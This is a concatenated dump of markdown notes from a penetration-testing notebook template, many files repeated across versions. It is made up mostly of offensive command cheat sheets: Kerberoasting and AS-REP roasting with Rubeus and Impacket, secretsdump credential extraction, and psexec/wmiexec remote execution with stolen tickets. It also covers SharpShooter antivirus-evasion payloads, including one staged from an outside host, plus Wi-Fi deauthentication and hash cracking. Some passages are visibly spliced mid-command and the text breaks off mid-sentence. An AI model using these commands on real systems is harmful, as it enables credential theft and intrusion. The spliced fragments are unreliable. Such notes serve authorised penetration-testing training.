Kali Linux: 6 | 7 | apt install powershell-empire 8 | 9 | Install Empire Manually: 10 | 11 | 1. cd /Empire/setup 12 | 2. ./install.sh 13 | 14 | - Current Listeners: 15 | 16 | (Empire) > listeners 17 | [!] No listeners currently active 18 | (Empire: listeners) > uselistener 19 | dbx http http_com http_foreign http_hop http_mapi meterpreter onedrive redirector 20 | 21 | 22 | ## Covenant 23 | 24 | Source: https://github.com/cobbr/Covenant 25 | 26 | Installation on Kali: 27 | 28 | 1. apt install dotnet-sdk-2.2 29 | 2. git clone --recurse-submodules https://github.com/cobbr/Covenant 30 | 3. cd Covenant/Covenant 31 | 4. dotnet build 32 | 5. dotnet run 33 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Rubeus.md: -------------------------------------------------------------------------------- 1 | # Source 2 | 3 | - https://github.com/GhostPack/Rubeus 4 | 5 | Review the opsec notes before compiling the program in visual studio. 6 | 7 | ## ASREProasting: 8 | 9 | chek for users in the current domain: 10 | 11 | - Rubeus.exe asreproast /format: /outfile: 12 | 13 | ## Kerberoasting: 14 | 15 | - Rubeus.exe kerberoast /outfile: 16 | 17 | - Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 18 | 19 | ## Pass the key (PTK): 20 | 21 | - .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt 22 | 23 | 24 | ## Using the ticket on a Windows target: 25 | 26 | - Rubeus.exe ptt /ticket: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Rubeus.md: -------------------------------------------------------------------------------- 1 | # Source 2 | 3 | - https://github.com/GhostPack/Rubeus 4 | 5 | Review the opsec notes before compiling the program in visual studio. 6 | 7 | ## ASREProasting: 8 | 9 | chek for users in the current domain: 10 | 11 | - Rubeus.exe asreproast /format: /outfile: 12 | 13 | ## Kerberoasting: 14 | 15 | - Rubeus.exe kerberoast /outfile: 16 | 17 | - Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 18 | 19 | ## Pass the key (PTK): 20 | 21 | - .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt 22 | 23 | 24 | ## Using the ticket on a Windows target: 25 | 26 | - Rubeus.exe ptt /ticket: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Rubeus.md: -------------------------------------------------------------------------------- 1 | # Source 2 | 3 | - https://github.com/GhostPack/Rubeus 4 | 5 | Review the opsec notes before compiling the program in visual studio. 6 | 7 | ## ASREProasting: 8 | 9 | chek for users in the current domain: 10 | 11 | - Rubeus.exe asreproast /format: /outfile: 12 | 13 | ## Kerberoasting: 14 | 15 | - Rubeus.exe kerberoast /outfile: 16 | 17 | - Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 18 | 19 | ## Pass the key (PTK): 20 | 21 | - .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt 22 | 23 | 24 | ## Using the ticket on a Windows target: 25 | 26 | - Rubeus.exe ptt /ticket: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## What does the targets network look like: 2 | 3 | - /sbin/ifconfig -a 4 | - /sbin/ip addr 5 | - cat /etc/network/interfaces 6 | - cat /etc/sysconfig/network 7 | - ip addr show 8 | 9 | ## Network configuration Settings: 10 | 11 | - cat /etc/resolv.conf 12 | - cat /etc/sysconfig/network 13 | - cat /etc/networks 14 | - iptables -L 15 | - hostname 16 | - dnsdomainname 17 | 18 | ## List all current connections 19 | 20 | - lsof -i 21 | - lsof -i :80 22 | - grep 80 /etc/services 23 | - netstat -antup 24 | - netstat -antpx 25 | - netstat -tulpn 26 | - chkconfig --list 27 | - chkconfig --list | grep 3:on 28 | 29 | ## Check the routes: 30 | 31 | - arp -e 32 | - route 33 | - route -n 34 | - /sbin/route -nee 35 | - ip route list 36 | 37 | References: 38 | 39 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Wordlists.md: -------------------------------------------------------------------------------- 1 | ## Local in Kali: 2 | 3 | /usr/share/wordlists 4 | 5 | ## Other Resources: 6 | 7 | Have I been Pwned 8 | 9 | - https://haveibeenpwned.com/Passwords 10 | 11 | Seclists: 12 | 13 | - In Kali: apt install seclists 14 | - Usernames: https://github.com/danielmiessler/SecLists/tree/master/Usernames 15 | - Passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords 16 | 17 | Crackstation's Dictionary List: 18 | 19 | - https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm 20 | 21 | Rainbow Tables (Rainbow Crack): 22 | 23 | - http://project-rainbowcrack.com/table.htm 24 | 25 | Rocktastic Mega Wordlist: 26 | 27 | - https://labs.nettitude.com/tools/rocktastic/ 28 | 29 | Tools to make your own wordlists: 30 | 31 | - Crunch 32 | - Cewl -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/Tips for Writing a Report.md: -------------------------------------------------------------------------------- 1 | 1. Understand who is going to be reading this and who is the target audience? 2 | 2. The report needs to clear that a non-technical person would understand 3 | 3. Report should include the following: 4 | 1. Executive Summary 5 | 2. Technical Summary 6 | 3. Detail Report of findings 7 | 4. Include references from MITRE ATT&CK (https://attack.mitre.org/) 8 | 5. Recommendations for remediation (If possible) 9 | 10 | 11 | 12 | 13 | Resources: 14 | 15 | - https://blog.zsec.uk/ltr101-pentest-reporting/ 16 | - 17 | 18 | Public Pentesting Reports: 19 | 20 | - https://github.com/juliocesarfort/public-pentesting-reports 21 | - https://www.hackthebox.com/storage/press/samplereport/sample-penetration-testing-report-template.pdf 22 | - https://www.offsec.com/pwk-online/OSCP-Exam-Report.docx -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Other Scanners.md: -------------------------------------------------------------------------------- 1 | # Unicornscan: 2 | - unicornscan -mU -p ,161,162,137,123,138,1434,445,135,67,68,53,139,500,637,162,69 3 | 4 | # Netcat 5 | ``` 6 | #!/bin/bash 7 | for i in {0..255}; do 8 | for j in {0..255};do 9 | for k in {0..65535};do 10 | nc -v -z -n -w 1 10.100.${i}.${j} ${k} >> nc_port_scan.txt 11 | done 12 | done 13 | done 14 | ``` 15 | 16 | # Naabu 17 | 18 | Source: https://github.com/projectdiscovery/naabu 19 | 20 | ## Installing Naabu: 21 | 22 | Latest: 23 | go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest 24 | 25 | In Kali Linux: 26 | sudo apt install naabu 27 | 28 | ## Using Naabu: 29 | - naabu -host megacorpone.com 30 | - naabu -p 80,443,21-23,u:53 -host megacorpone.com 31 | - naabu -p - -exclude-ports 80,443 -host megacorpone.com 32 | - naabu -host megacorpone.com -json -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/2. C2 Frameworks.md: -------------------------------------------------------------------------------- 1 | ## Empire C2: 2 | 3 | Github: https://github.com/BC-SECURITY/Empire 4 | 5 | In Kali Linux: 6 | 7 | apt install powershell-empire 8 | 9 | Install Empire Manually: 10 | 11 | 1. cd /Empire/setup 12 | 2. ./install.sh 13 | 14 | - Current Listeners: 15 | 16 | (Empire) > listeners 17 | [!] No listeners currently active 18 | (Empire: listeners) > uselistener 19 | dbx http http_com http_foreign http_hop http_mapi meterpreter onedrive redirector 20 | 21 | 22 | ## Covenant 23 | 24 | Source: https://github.com/cobbr/Covenant 25 | 26 | In Kali Repo: 27 | 28 | sudo apt install covenant-kbx 29 | 30 | Installing manually on Kali: 31 | 32 | 1. apt install dotnet-sdk-2.2 33 | 2. git clone --recurse-submodules https://github.com/cobbr/Covenant 34 | 3. cd Covenant/Covenant 35 | 4. dotnet build 36 | 5. dotnet run 37 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md: -------------------------------------------------------------------------------- 1 | # Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 2 | 3 | 4 | Anonymous Credential LDAP Dumping: 5 | 6 | - ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’ 7 | 8 | Impacket GetADUsers.py (Must have valid credentials) 9 | 10 | - GetADUsers.py -all -dc-ip 11 | 12 | Impacket lookupsid.py: 13 | 14 | - /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0 15 | 16 | Windapsearch: 17 | 18 | https://github.com/ropnop/windapsearch 19 | 20 | - python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U 21 | 22 | ## References: 23 | 24 | - PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/5. FTP/General Notes.md: -------------------------------------------------------------------------------- 1 | # FTP Enumeration Tools 2 | 3 | ### Nmap Enumeration 4 | ``` 5 | $ ls -lh /usr/share/nmap/scripts/ | grep ftp 6 | -rw-r--r-- 1 root root 4.5K Oct 12 09:29 ftp-anon.nse 7 | -rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-bounce.nse 8 | -rw-r--r-- 1 root root 3.1K Oct 12 09:29 ftp-brute.nse 9 | -rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-libopie.nse 10 | -rw-r--r-- 1 root root 3.3K Oct 12 09:29 ftp-proftpd-backdoor.nse 11 | -rw-r--r-- 1 root root 3.7K Oct 12 09:29 ftp-syst.nse 12 | -rw-r--r-- 1 root root 5.9K Oct 12 09:29 ftp-vsftpd-backdoor.nse 13 | -rw-r--r-- 1 root root 5.8K Oct 12 09:29 ftp-vuln-cve2010-4221.nse 14 | -rw-r--r-- 1 root root 5.7K Oct 12 09:29 tftp-enum.nse 15 | $ nmap x.x.x.x -p 21 -sV --script=exampleScript1.nse,exampleScript2.nse 16 | ``` 17 | ### Manual Connection 18 | ``` 19 | $ ftp x.x.x.x 20 | ``` 21 | ``` 22 | $ nc x.x.x. 21 23 | ``` 24 | ### Connect via Browser 25 | ``` 26 | ftp://x.x.x.x 27 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Wordlists.md: -------------------------------------------------------------------------------- 1 | ## Local in Kali: 2 | 3 | /usr/share/wordlists 4 | 5 | ## Other Resources: 6 | 7 | Have I been Pwned 8 | 9 | - https://haveibeenpwned.com/Passwords 10 | 11 | Seclists: 12 | 13 | - In Kali: apt install seclists 14 | - Usernames: https://github.com/danielmiessler/SecLists/tree/master/Usernames 15 | - Passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords 16 | 17 | Crackstation's Dictionary List: 18 | 19 | - https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm 20 | 21 | Rainbow Tables (Rainbow Crack): 22 | 23 | - http://project-rainbowcrack.com/table.htm 24 | 25 | Rocktastic Mega Wordlist: 26 | 27 | - https://labs.nettitude.com/tools/rocktastic/ 28 | 29 | berzerk0 wordlist: 30 | 31 | - https://www.hack3r.com/forum-topic/wikipedia-wordlist 32 | 33 | Weakpass: 34 | 35 | - https://www.hack3r.com/forum-topic/wikipedia-wordlist 36 | 37 | Tools to make your own wordlists: 38 | 39 | - Crunch 40 | - Cewl -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Wordlists.md: -------------------------------------------------------------------------------- 1 | ## Local in Kali: 2 | 3 | /usr/share/wordlists 4 | 5 | ## Other Resources: 6 | 7 | Have I been Pwned 8 | 9 | - https://haveibeenpwned.com/Passwords 10 | 11 | Seclists: 12 | 13 | - In Kali: apt install seclists 14 | - Usernames: https://github.com/danielmiessler/SecLists/tree/master/Usernames 15 | - Passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords 16 | 17 | Crackstation's Dictionary List: 18 | 19 | - https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm 20 | 21 | Rainbow Tables (Rainbow Crack): 22 | 23 | - http://project-rainbowcrack.com/table.htm 24 | 25 | Rocktastic Mega Wordlist: 26 | 27 | - https://labs.nettitude.com/tools/rocktastic/ 28 | 29 | berzerk0 wordlist: 30 | 31 | - https://www.hack3r.com/forum-topic/wikipedia-wordlist 32 | 33 | Weakpass: 34 | 35 | - https://www.hack3r.com/forum-topic/wikipedia-wordlist 36 | 37 | Tools to make your own wordlists: 38 | 39 | - Crunch 40 | - Cewl -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/General Information.md: -------------------------------------------------------------------------------- 1 | Created by TJ Null: 2 | 3 | Twitter: https://twitter.com/TJ_Null 4 | Github: https://github.com/tjnull 5 | 6 | Contribution: 7 | 8 | If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here: 9 | - https://github.com/tjnull/TJ-JPT 10 | 11 | ## Changelog: 12 | 13 | v1.0: Original Template 14 | 15 | v2.0 16 | 17 | 2. Enumeration 18 | - Added an FTP Notebook to include notes for that identified service 19 | - Added more content in Active Directory 20 | - Web has a subnotebook to include any content from the changelog.txt file 21 | - Fixed the gobuster oneliners to match with the recent changes from the tool 22 | 23 | 3. Exploitation 24 | - Added some custom options for searchsploit 25 | 26 | 4. Post Exploitation 27 | - Moved the subnotebook into a subnotebook (Target #1) so the user can copy the subnotebook and add another one under post exploitation for other targets. 28 | - Created a sub notebook to include the output from automated priv esc scripts that are used. 29 | - Included tools, tips, and resources in all sections for priv esc -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md: -------------------------------------------------------------------------------- 1 | # Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 2 | 3 | 4 | Anonymous Credential LDAP Dumping: 5 | 6 | - ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’ 7 | 8 | Impacket GetADUsers.py (Must have valid credentials) 9 | 10 | - GetADUsers.py -all -dc-ip 11 | 12 | Impacket lookupsid.py: 13 | 14 | - /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0 15 | 16 | Impacket Secretdump: 17 | 18 | python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin 19 | 20 | Windapsearch: 21 | 22 | https://github.com/ropnop/windapsearch 23 | 24 | - python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U 25 | 26 | 27 | 28 | ## References: 29 | 30 | - PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise 31 | 32 | - Attacking Active Directory: 0 to 0.9: 33 | https://zer1t0.gitlab.io/posts/attacking_ad/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypassing AV.md: -------------------------------------------------------------------------------- 1 | ## Veil Framework: 2 | 3 | Install on Kali: 4 | - apt install veil 5 | - /usr/share/veil/config/setup.sh --force --silent 6 | 7 | Reference: https://github.com/Veil-Framework/Veil 8 | 9 | ## Shellter 10 | 11 | Source: https://www.shellterproject.com/download/ 12 | 13 | - apt install shellter 14 | 15 | 16 | ## Sharpshooter 17 | 18 | Javascript Payload Stageless: 19 | - SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3 20 | 21 | Stageless HTA Payload: 22 | 23 | - SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee 24 | 25 | Staged VBS: 26 | 27 | - SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4 28 | 29 | Reference: https://github.com/mdsecactivebreach/SharpShooter 30 | 31 | ## Donut: 32 | 33 | Source: https://github.com/TheWover/donut 34 | 35 | ## Vulcan 36 | 37 | Source: https://github.com/praetorian-code/vulcan 38 | 39 | 40 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md: -------------------------------------------------------------------------------- 1 | DICTIONARY ATTACK 2 | - john --format=#type --wordlist=dict.txt hash.txt 3 | 4 | BRUTEFORCE ATTACK 5 | - john --format=#type hash. txt 6 | 7 | MASK ATTACK 8 | - john --format=#type --mask=?l?l?l?l?l?l hash.txt -min-len=6 9 | 10 | INCREMENTAL ATTACK 11 | - john --incremental hash.txt 12 | 13 | DICTIONARY + RULES ATTACK 14 | - john --format=#type --wordlist=dict.t 15 | 16 | 17 | Other Notes: 18 | 19 | BENCHMARK TEST 20 | - john --test 21 | 22 | SESSION NAME 23 | - john hash.txt --session=example_name 24 | 25 | SESSION RESTORE 26 | - john --restore=example_name 27 | 28 | SHOW CRACKED RESULTS 29 | - john hash.txt --pot= --show 30 | 31 | WORDLIST GENERATION 32 | - john --wordlist=dict.txt --stdout --external:[filter name] > out.txt 33 | 34 | CRACKING SSH KEYS: 35 | 36 | - /usr/share/john/ssh2john.py id_rsa > hash.john 37 | - john --wordlist=/usr/share/wordlists/rockyou.txt hash.john 38 | 39 | CRACKING KRB5TGS KEYS 40 | 41 | - john --format=krb5tgs --wordlist= --show 30 | 31 | WORDLIST GENERATION 32 | - john --wordlist=dict.txt --stdout --external:[filter name] > out.txt 33 | 34 | CRACKING SSH KEYS: 35 | 36 | - /usr/share/john/ssh2john.py id_rsa > hash.john 37 | - john --wordlist=/usr/share/wordlists/rockyou.txt hash.john 38 | 39 | CRACKING KRB5TGS KEYS 40 | 41 | - john --format=krb5tgs --wordlist= --show 30 | 31 | WORDLIST GENERATION 32 | - john --wordlist=dict.txt --stdout --external:[filter name] > out.txt 33 | 34 | CRACKING SSH KEYS: 35 | 36 | - /usr/share/john/ssh2john.py id_rsa > hash.john 37 | - john --wordlist=/usr/share/wordlists/rockyou.txt hash.john 38 | 39 | CRACKING KRB5TGS KEYS 40 | 41 | - john --format=krb5tgs --wordlist= -format hashcat/john 4 | 5 | ## GetUserSPNs 6 | 7 | ASREPRoast: 8 | - impacket-GetUserSPNs /: -request -format -outputfile 9 | - impacket-GetUserSPNs / -usersfile -format -outputfile 10 | 11 | Kerberoasting: 12 | - impacket-GetUserSPNs /: -outputfile 13 | 14 | Overpass The Hash/Pass The Key (PTK): 15 | - python3 getTGT.py / -hashes [lm_hash]: 16 | - python3 getTGT.py / -aesKey 17 | - python3 getTGT.py /:[password] 18 | 19 | ## Using TGT key to excute remote commands from the following impacket scripts: 20 | 21 | - python3 psexec.py /@ -k -no-pass 22 | - python3 smbexec.py /@ -k -no-pass 23 | - python3 wmiexec.py /@ -k -no-pass 24 | 25 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket Kerberoasting.md: -------------------------------------------------------------------------------- 1 | ## Check for Kerberoasting: 2 | 3 | - GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip -format hashcat/john 4 | 5 | ## GetUserSPNs 6 | 7 | ASREPRoast: 8 | - impacket-GetUserSPNs /: -request -format -outputfile 9 | - impacket-GetUserSPNs / -usersfile -format -outputfile 10 | 11 | Kerberoasting: 12 | - impacket-GetUserSPNs /: -outputfile 13 | 14 | Overpass The Hash/Pass The Key (PTK): 15 | - python3 getTGT.py / -hashes [lm_hash]: 16 | - python3 getTGT.py / -aesKey 17 | - python3 getTGT.py /:[password] 18 | 19 | ## Using TGT key to excute remote commands from the following impacket scripts: 20 | 21 | - python3 psexec.py /@ -k -no-pass 22 | - python3 smbexec.py /@ -k -no-pass 23 | - python3 wmiexec.py /@ -k -no-pass 24 | 25 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Searchsploit.md: -------------------------------------------------------------------------------- 1 | ## Installing searchsploit (Already in Kali) 2 | 3 | - apt update && apt install exploitdb 4 | 5 | ## Install binsploits 6 | Note: bin-sploits contains a set of compiled binaries that are tied to exploits in the exploitdb database. Installing this package will take some time depending on your network connection. 7 | 8 | - apt update && apt install exploitdb-bin-sploits 9 | 10 | ## updating searchsploit 11 | 12 | - searchsploit -u 13 | 14 | ## Basic Searching: 15 | 16 | - searchsploit etc 17 | - searchsploit -t php windows 18 | 19 | ## Exclude unwanted results 20 | - searchsploit linux kernel 5.2 --exclude="Poc" 21 | 22 | ## View exploits from Searchsploit 23 | - searchsploit 9542 --examine 24 | - searchsploit -x window/remote/42031.py 25 | 26 | 27 | ## Copy exploit to current working directory 28 | - searchsploit -m 29 | 30 | ## Access Exploits from Exploit-DB website: 31 | - searchsploit vsftpd 2.3.4 -w 32 | 33 | ## Run an nmap scan result through searchsploit: 34 | 1. Nmap -Pn 172.21.0.0 -oX results.xml 35 | 2. searchsploit -x --nmap results.xml 36 | 37 | Referneces: 38 | 39 | - https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md: -------------------------------------------------------------------------------- 1 | ## Capture Handshake 2 | 3 | 1. airmon-ng start wlan0 4 | 2. airodump-ng mon0 --write capture.cap -c 11 5 | 3. aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0 6 | 7 | Convert pcap files for john and hashcat 8 | 9 | /usr/lib/hashcat-utils/cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid] 10 | /usr/sbin/hccap2john 11 | /usr/sbin/vncpcap2john 12 | /usr/sbin/wpapcap2john 13 | 14 | 15 | ## Cracking Handshake with Aircrack 16 | 17 | - aircrack-ng -w /usr/share/wordlist/fasttrack.txt 0001.cap 18 | 19 | ## Cracking Handshakes with Hashcat 20 | 21 | - hashcat.exe -m 2500 capture.hccapx rockyou.txt (Dictionary Attack) 22 | - hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d (Brute-Force) 23 | - hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt (Rule-Based) 24 | 25 | ## Cracking Handshakes with John The Ripper 26 | 27 | Did you run hccap2john? 28 | 29 | - john --format=wpapsk --wordlist=/usr/share/wordlists/rockyou.txt crackmecap 30 | - john --format=wpapsk-opencl --wordlist=/usr/share/wordlists/rockyou.txt crackmecap 31 | 32 | 33 | 34 | Other Resources: 35 | 36 | https://github.com/lgandx/PCredz -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket Kerberoasting.md: -------------------------------------------------------------------------------- 1 | ## Check for Kerberoasting: 2 | 3 | - GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip -format hashcat/john 4 | 5 | ## GetUserSPNs 6 | 7 | ASREPRoast: 8 | - impacket-GetUserSPNs /: -request -format -outputfile 9 | - impacket-GetUserSPNs / -usersfile -format -outputfile 10 | 11 | Kerberoasting: 12 | - impacket-GetUserSPNs /: -outputfile 13 | 14 | Overpass The Hash/Pass The Key (PTK): 15 | - python3 getTGT.py / -hashes [lm_hash]: 16 | - python3 getTGT.py / -aesKey 17 | - python3 getTGT.py /:[password] 18 | 19 | ## Using TGT key to excute remote commands from the following impacket scripts: 20 | 21 | - python3 psexec.py /@ -k -no-pass 22 | - python3 smbexec.py /@ -k -no-pass 23 | - python3 wmiexec.py /@ -k -no-pass 24 | 25 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Searchsploit.md: -------------------------------------------------------------------------------- 1 | ## Installing searchsploit (Already in Kali) 2 | 3 | - apt update && apt install exploitdb 4 | 5 | ## Install binsploits 6 | Note: bin-sploits contains a set of compiled binaries that are tied to exploits in the exploitdb database. Installing this package will take some time depending on your network connection. 7 | 8 | - apt update && apt install exploitdb-bin-sploits 9 | 10 | ## updating searchsploit 11 | 12 | - searchsploit -u 13 | 14 | ## Basic Searching: 15 | 16 | - searchsploit etc 17 | - searchsploit -t php windows 18 | 19 | ## Exclude unwanted results 20 | - searchsploit linux kernel 5.2 --exclude="Poc" 21 | 22 | ## View exploits from Searchsploit 23 | - searchsploit 9542 --examine 24 | - searchsploit -x window/remote/42031.py 25 | 26 | 27 | ## Copy exploit to current working directory 28 | - searchsploit -m 29 | 30 | ## Access Exploits from Exploit-DB website: 31 | - searchsploit vsftpd 2.3.4 -w 32 | 33 | ## Run an nmap scan result through searchsploit: 34 | 1. Nmap -Pn 172.21.0.0 -oX results.xml 35 | 2. searchsploit -x --nmap results.xml 36 | 37 | Referneces: 38 | 39 | - https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/3. Active Directory (AD)/General Notes.md: -------------------------------------------------------------------------------- 1 | # Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 2 | 3 | 4 | # Anonymous Credential LDAP Dumping: 5 | 6 | - ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’ 7 | 8 | Impacket GetADUsers.py (Must have valid credentials) 9 | 10 | - GetADUsers.py -all -dc-ip 11 | 12 | Impacket lookupsid.py: 13 | 14 | - /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0 15 | 16 | Impacket Secretdump: 17 | 18 | python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin 19 | 20 | Windapsearch: 21 | 22 | https://github.com/ropnop/windapsearch 23 | 24 | - python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U 25 | 26 | Crackmapexec: 27 | 28 | - cme ldap -u "" -p "" -d 29 | 30 | - cme ldap -u "Guest" -p "" -d 31 | 32 | ## References: 33 | 34 | - PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise 35 | 36 | - Attacking Active Directory: 0 to 0.9: 37 | https://zer1t0.gitlab.io/posts/attacking_ad/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Masscan.md: -------------------------------------------------------------------------------- 1 | ## Scanning targets 2 | - masscan 172.21.10.0 3 | - masscan 172.21.10.0/24 172.21.0.0/16 4 | - masscan 172.21.10.0/24 --excludeFile 5 | - masscan 172.21.10.0/24 --exclude 172.21.10.254 6 | 7 | ## Scanning for services: 8 | - masscan 172.21.10.1 -p 80 9 | - masscan 172.21.10.1 -p 0-65535 10 | - masscan 172.21.10.1 -p 80,443 11 | - masscan 172.21.10.0/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent \ 12 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\ 13 | -oL "output.txt" 14 | # UDP Scan 15 | - masscan 172.21.10.1 -pU 53 16 | 17 | ## Report only open ports 18 | masscan 10.0.0.1 --open-only 19 | 20 | # Other Options 21 | ## Offline Mode (Reviews how fast the program runs without the transmit overhead) 22 | - masscan 0.0.0.0/24 --offline 23 | 24 | ## Obtaining Service banners: 25 | - masscan 172.21.10.1 --banners 26 | 27 | ## Set masscan to use a source ip 28 | masscan 10.0.0.1 --source-ip 192.168.1.200 29 | 30 | ## Change the default user agent 31 | masscan 10.0.0.1 --http-user-agent 32 | 33 | ## Save sent packet in PCAP 34 | masscan 10.0.0.1 --pcap 35 | 36 | # References: 37 | 38 | - https://github.com/robertdavidgraham/masscan 39 | - https://danielmiessler.com/study/masscan/ 40 | 41 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Transferring Files.md: -------------------------------------------------------------------------------- 1 | # Services to Host Files on your System: 2 | 3 | General Options: 4 | 5 | FTP: 6 | 7 | Install pyftpdlib 8 | - pip3 install pyftpdlib 9 | 10 | Pure-ftpd 11 | - sudo apt install pure-ftpd 12 | - service pure-ftpd start 13 | 14 | Run (-w flag allows anonymous write access) 15 | - Python3 -m pyftpdlib -p 21 -w 16 | 17 | Web: 18 | 19 | - Python3 -m http.server 443 20 | - service apache2 start 21 | 22 | Powershell: 23 | 24 | Raw (Will get flagged by 